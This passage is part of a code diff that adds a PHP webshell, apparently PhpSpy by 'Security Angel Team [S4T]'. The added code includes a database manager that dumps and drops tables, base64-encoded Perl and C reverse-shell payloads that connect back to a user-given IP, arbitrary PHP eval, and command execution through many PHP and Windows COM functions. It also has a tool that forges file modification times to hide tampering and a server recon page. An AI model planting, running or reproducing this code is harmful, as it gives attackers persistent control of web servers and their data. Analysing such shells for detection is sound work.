+			$fp = @fopen($path,'w');
+			if ($fp) {
+				$result = q('SHOW tables');
+				if (!$result) p('<h2>'.mysql_error().'</h2>');
+				$mysqldata = '';
+				while ($currow = mysql_fetch_array($result)) {
+					if (isset($table[$currow[0]])) {
+						sqldumptable($currow[0], $fp);
+					}
+				}
+				fclose($fp);
+				$fileurl = str_replace(SA_ROOT,'',$path);
+				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
+				mysql_close();
+			} else {
+				m('Backup failed');
+			}
+		}
+	}
+	if ($insert && $insertsql) {
+		$keystr = $valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			if ($val) {
+				$keystr .= $tmp.$key;
+				$valstr .= $tmp."'".addslashes($val)."'";
+				$tmp = ',';
+			}
+		}
+		if ($keystr && $valstr) {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
+		}
+	}
+	if ($update && $insertsql && $base64) {
+		$valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			$valstr .= $tmp.$key."='".addslashes($val)."'";
+			$tmp = ',';
+		}
+		if ($valstr) {
+			$where = base64_decode($base64);
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
+		}
+	}
+	if ($doing == 'del' && $base64) {
+		$where = base64_decode($base64);
+		$delete_sql = "DELETE FROM $tablename WHERE $where";
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
+	}
+
+	if ($tablename && $doing == 'drop') {
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		if (q("DROP TABLE $tablename")) {
+			m('Drop table of success');
+			$tablename = '';
+		} else {
+			m(mysql_error());
+		}
+	}
+
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+
+	formhead(array('title'=>'MYSQL Manager'));
+	makehide('action','sqladmin');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+?>
+<script type="text/javascript">
+function editrecord(action, base64, tablename){
+	if (action == 'del') {		
+		if (!confirm('Is or isn\'t deletion record?')) return;
+	}
+	$('recordlist').doing.value=action;
+	$('recordlist').base64.value=base64;
+	$('recordlist').tablename.value=tablename;
+	$('recordlist').submit();
+}
+function moddbname(dbname) {
+	if(!dbname) return;
+	$('setdbname').dbname.value=dbname;
+	$('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+	if(!tablename) return;
+	if (doing) {
+		$('settable').doing.value=doing;
+	}
+	if (page) {
+		$('settable').page.value=page;
+	}
+	$('settable').tablename.value=tablename;
+	$('settable').submit();
+}
+</script>
+<?php
+	//²Ù×÷¼Ç¼
+	formhead(array('name'=>'recordlist'));
+	makehide('doing');
+	makehide('action','sqladmin');
+	makehide('base64');
+	makehide('tablename');
+	p($dbform);
+	formfoot();
+
+	//Ñ¡¶¨Êý¾Ý¿â
+	formhead(array('name'=>'setdbname'));
+	makehide('action','sqladmin');
+	p($dbform);
+	if (!$dbname) {
+		makehide('dbname');
+	}
+	formfoot();
+
+	//Ñ¡¶¨±í
+	formhead(array('name'=>'settable'));
+	makehide('action','sqladmin');
+	p($dbform);
+	makehide('tablename');
+	makehide('page',$page);
+	makehide('doing');
+	formfoot();
+
+	$cachetables = array();	
+	$pagenum = 30;
+	$page = intval($page);
+	if($page) {
+		$start_limit = ($page - 1) * $pagenum;
+	} else {
+		$start_limit = 0;
+		$page = 1;
+	}
+	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		//»ñÈ¡Êý¾Ý¿âÐÅÏ¢
+		$mysqlver = mysql_get_server_info();
+		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+		$highver = $mysqlver > '4.1' ? 1 : 0;
+
+		//»ñÈ¡Êý¾Ý¿â
+		$query = q("SHOW DATABASES");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = mysql_fetch_array($query)) {
+			$dbs[$db['Database']] = $db['Database'];
+		}
+		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+		$tabledb = array();
+		if ($dbname) {
+			p('<p>');
+			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
+			if ($tablename) {
+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+			}
+			p('</p>');
+			mysql_select_db($dbname);
+
+			$getnumsql = '';
+			$runquery = 0;
+			if ($sql_query) {
+				$runquery = 1;
+			}
+			$allowedit = 0;
+			if ($tablename && !$sql_query) {
+				$sql_query = "SELECT * FROM $tablename";
+				$getnumsql = $sql_query;
+				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
+				$allowedit = 1;
+			}
+			p('<form action="'.$self.'" method="POST">');
+			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+			makehide('tablename', $tablename);
+			makehide('action','sqladmin');
+			p($dbform);
+			p('</form>');
+			if ($tablename || ($runquery && $sql_query)) {
+				if ($doing == 'structure') {
+					$result = q("SHOW COLUMNS FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Field</td>');
+					p('<td>Type</td>');
+					p('<td>Null</td>');
+					p('<td>Key</td>');
+					p('<td>Default</td>');
+					p('<td>Extra</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Field'].'</td>');
+						p('<td>'.$row['Type'].'</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Key'].'&nbsp;</td>');
+						p('<td>'.$row['Default'].'&nbsp;</td>');
+						p('<td>'.$row['Extra'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+				} elseif ($doing == 'insert' || $doing == 'edit') {
+					$result = q('SHOW COLUMNS FROM '.$tablename);
+					while ($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					$rs = array();
+					if ($doing == 'insert') {
+						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+					} else {
+						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+						$where = base64_decode($base64);
+						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
+						$rs = mysql_fetch_array($result);
+					}
+					p('<form method="post" action="'.$self.'">');
+					p($dbform);
+					makehide('action','sqladmin');
+					makehide('tablename',$tablename);
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					foreach ($rowdb as $row) {
+						if ($rs[$row['Field']]) {
+							$value = htmlspecialchars($rs[$row['Field']]);
+						} else {
+							$value = '';
+						}
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+					}
+					if ($doing == 'insert') {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+					} else {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+						makehide('base64', $base64);
+					}
+					p('</table></form>');
+				} else {
+					$querys = @explode(';',$sql_query);
+					foreach($querys as $num=>$query) {
+						if ($query) {
+							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+							switch(qy($query))
+							{
+								case 0:
+									p('<h2>Error : '.mysql_error().'</h2>');
+									break;	
+								case 1:
+									if (strtolower(substr($query,0,13)) == 'select * from') {
+										$allowedit = 1;
+									}
+									if ($getnumsql) {
+										$tatol = mysql_num_rows(q($getnumsql));
+										$multipage = multi($tatol, $pagenum, $page, $tablename);
+									}
+									if (!$tablename) {
+										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
+										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+										$tablename = $matches[1][0];
+									}
+									$result = q($query);
+									p($multipage);
+									p('<table border="0" cellpadding="3" cellspacing="0">');
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)</span></td>");
+									}
+									p('</tr>');
+									while($mn = @mysql_fetch_assoc($result)){
+										$thisbg = bg();
+										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+										$where = $tmp = $b1 = '';
+										foreach($mn as $key=>$inside){
+											if ($inside) {
+												$where .= $tmp.$key."='".addslashes($inside)."'";
+												$tmp = ' AND ';
+											}
+											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+										}
+										$where = base64_encode($where);
+										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+										p($b1);
+										p('</tr>');
+										unset($b1);
+									}
+									tbfoot();
+									p($multipage);
+									break;	
+								case 2:
+									$ar = mysql_affected_rows();
+									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+									break;
+							}
+						}
+					}
+				}
+			} else {
+				$query = q("SHOW TABLE STATUS");
+				$table_num = $table_rows = $data_size = 0;
+				$tabledb = array();
+				while($table = mysql_fetch_array($query)) {
+					$data_size = $data_size + $table['Data_length'];
+					$table_rows = $table_rows + $table['Rows'];
+					$table['Data_length'] = sizecount($table['Data_length']);
+					$table_num++;
+					$tabledb[] = $table;
+				}
+				$data_size = sizecount($data_size);
+				unset($table);
+				p('<table border="0" cellpadding="0" cellspacing="0">');
+				p('<form action="'.$self.'" method="POST">');
+				makehide('action','sqladmin');
+				p($dbform);
+				p('<tr class="head">');
+				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('</tr>');
+				foreach ($tabledb as $key => $table) {
+					$thisbg = bg();
+					p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
+					p('<td>'.$table['Rows'].'</td>');
+					p('<td>'.$table['Data_length'].'</td>');
+					p('<td>'.$table['Create_time'].'</td>');
+					p('<td>'.$table['Update_time'].'</td>');
+					if ($highver) {
+						p('<td>'.$table['Engine'].'</td>');
+						p('<td>'.$table['Collation'].'</td>');
+					}
+					p('</tr>');
+				}
+				p('<tr class='.bg().'>');
+				p('<td>&nbsp;</td>');
+				p('<td>Total tables: '.$table_num.'</td>');
+				p('<td>'.$table_rows.'</td>');
+				p('<td>'.$data_size.'</td>');
+				p('<td colspan="'.($highver ? 4 : 2).'">&nbsp;</td>');
+				p('</tr>');
+
+				p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
+				makehide('doing','backupmysql');
+				formfoot();
+				p("</table>");
+				fr($query);
+			}
+		}
+	}
+	tbfoot();
+	@mysql_close();
+}//end sql backup
+
+
+elseif ($action == 'backconnect') {
+	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
+	!$yourport && $yourport = '12345';
+	$usedb = array('perl'=>'perl','c'=>'c');
+
+	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+	if ($start && $yourip && $yourport && $use){
+		if ($use == 'perl') {
+			cf('/tmp/angel_bc',$back_connect);
+			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
+		} else {
+			cf('/tmp/angel_bc.c',$back_connect_c);
+			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+			@unlink('/tmp/angel_bc.c');
+			$res = execute("/tmp/angel_bc $yourip $yourport &");
+		}
+		m("Now script try connect to $yourip port $yourport ...");
+	}
+
+	formhead(array('title'=>'Back Connect'));
+	makehide('action','backconnect');
+	p('<p>');
+	p('Your IP:');
+	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
+	p('Your Port:');
+	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
+	p('Use:');
+	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+	makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+}//end sql backup
+
+elseif ($action == 'eval') {
+	$phpcode = trim($phpcode);
+	if($phpcode){
+		if (!preg_match('#<\?#si', $phpcode)) {
+			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+		}
+		eval("?".">$phpcode<?");
+	}
+	formhead(array('title'=>'Eval PHP Code'));
+	makehide('action','eval');
+	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
+	p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
+	formfooter();
+}//end eval
+
+elseif ($action == 'editfile') {
+	if(file_exists($opfile)) {
+		$fp=@fopen($opfile,'r');
+		$contents=@fread($fp, filesize($opfile));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+	formfooter();
+}//end editfile
+
+elseif ($action == 'newtime') {
+	$opfilemtime = @filemtime($opfile);
+	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	formhead(array('title'=>'Clone file was last modified time'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+	formfooter();
+	formhead(array('title'=>'Set last modified'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	p('<p>Instead &raquo;');
+	p('year:');
+	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+	p('month:');
+	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+	p('day:');
+	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+	p('hour:');
+	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+	p('minute:');
+	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+	p('second:');
+	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+	p('</p>');
+	formfooter();
+}//end newtime
+
+elseif ($action == 'shell') {
+	if (IS_WIN && IS_COM) {
+		if($program && $parameter) {
+			$shell= new COM('Shell.Application');
+			$a = $shell->ShellExecute($program,$parameter);
+			m('Program run has '.(!$a ? 'success' : 'fail'));
+		}
+		!$program && $program = 'c:\windows\system32\cmd.exe';
+		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+		formhead(array('title'=>'Execute Program'));
+		makehide('action','shell');
+		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+		p('<p>');
+		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+		p('</p>');
+		formfoot();
+	}
+	formhead(array('title'=>'Execute Command'));
+	makehide('action','shell');
+	if (IS_WIN && IS_COM) {
+		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+	}
+	p('<p>');
+	makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
+	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($command) {
+		p('<hr width="100%" noshade /><pre>');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo(execute($command));
+		}
+		p('</pre>');
+	}
+}//end shell
+
+elseif ($action == 'phpenv') {
+	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+	!$dis_func && $dis_func = 'No';	
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',$adminmail),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',$upsize),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',$dis_func),
+	);
+
+	if($phpvarname) {
+		m($phpvarname .' : '.getcfg($phpvarname));
+	}
+
+	formhead(array('title'=>'Server environment'));
+	makehide('action','phpenv');
+	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+	formfooter();
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=23;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+else {
+	m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+	Copyright (C) 2004-2008 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êý¿â
+======================================================*/
+
+function m($msg) {
+	echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $admin, $timestamp, $_SERVER;
+	$key = ($prefix ? $admin['cookiepre'] : '').$key;
+	$life = $life ? $life : $admin['cookielife'];
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
+}	
+function multi($num, $perpage, $curpage, $tablename) {
+	$multipage = '';
+	if($num > $perpage) {
+		$page = 10;
+		$offset = 5;
+		$pages = @ceil($num / $perpage);
+		if($page > $pages) {
+			$from = 1;
+			$to = $pages;
+		} else {
+			$from = $curpage - $offset;
+			$to = $curpage + $page - $offset - 1;
+			if($from < 1) {
+				$to = $curpage + 1 - $from;
+				$from = 1;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$to = $page;
+				}
+			} elseif($to > $pages) {
+				$from = $curpage - $pages + $to;
+				$to = $pages;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$from = $pages - $page + 1;
+				}
+			}
+		}
+		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
+		for($i = $from; $i <= $to; $i++) {
+			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
+		}
+		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
+		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
+	}
+	return $multipage;
+}
+// µÇ½Èë¿Ú
+function loginpage() {
+?>
+	<style type="text/css">
+	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+	</style>
+	<form method="POST" action="">
+	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+	<input type="hidden" name="doing" value="login">
+	<input type="submit" value="Login">
+	</form>
+<?php
+	exit;
+}//end loginpage()
+
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024); 
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+function which($pr) {
+	$path = execute("which $pr");
+	return ($path ? $path : $pr); 
+}
+
+function cf($fname,$text){
+	if($fp=@fopen($fname,'w')) {
